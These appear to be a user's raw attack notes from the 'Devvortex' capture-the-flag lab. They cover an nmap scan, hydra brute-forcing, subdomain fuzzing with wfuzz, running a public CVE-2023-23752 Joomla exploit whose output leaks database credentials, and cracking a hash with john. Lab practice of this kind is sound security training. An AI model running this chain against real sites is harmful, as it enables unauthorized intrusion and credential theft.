10.10.11.242
lewis P4ntherg0t1n5r3c0n##
logan tequieromucho


--------------------------------------------------------------------------------------------

└─$ nmap -sCV -Pn -p- --open 10.10.11.242 -o devvortex-nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-29 03:13 EST
Nmap scan report for 10.10.11.242
Host is up (0.057s latency).
Not shown: 65394 closed tcp ports (conn-refused), 139 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.39 seconds


--------------------------------------------------------------------------------------------


hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.109 -s 8080 http-get "/host-manager/html"
 dirsearch -u http://devvortex.htb:80 -e "php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz, zip, 7z" -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x '400,403,404'

wfuzz -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.devvortex.htb" --hc 403,400,301 -t 50 --hl 7 devvortex.htb
000000022:   200        501 L    1581 W     23221 Ch    "dev"    

dev.devvortex.htb

http://dev.devvortex.htb/administrator/manifests/files/joomla.xml

joomla 4.2.6

git clone https://github.com/Acceis/exploit-CVE-2023-23752.git
gem install httpx docopt paint

┌──(kali㉿kali)-[~/stuffs/htb/devvortex.htb/exploit-CVE-2023-23752]
└─$ ruby exploit.rb http://dev.devvortex.htb
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

lewis P4ntherg0t1n5r3c0n##
https://vulncheck.com/blog/joomla-for-rce
system ->  Templates Site Templates


john loganhash --wordlist=/usr/share/wordlists/rockyou.txt

logan tequieromucho

--------------------------------------------------------------------------------------------
logan tequieromucho


--------------------------------------------------------------------------------------------





--------------------------------------------------------------------------------------------

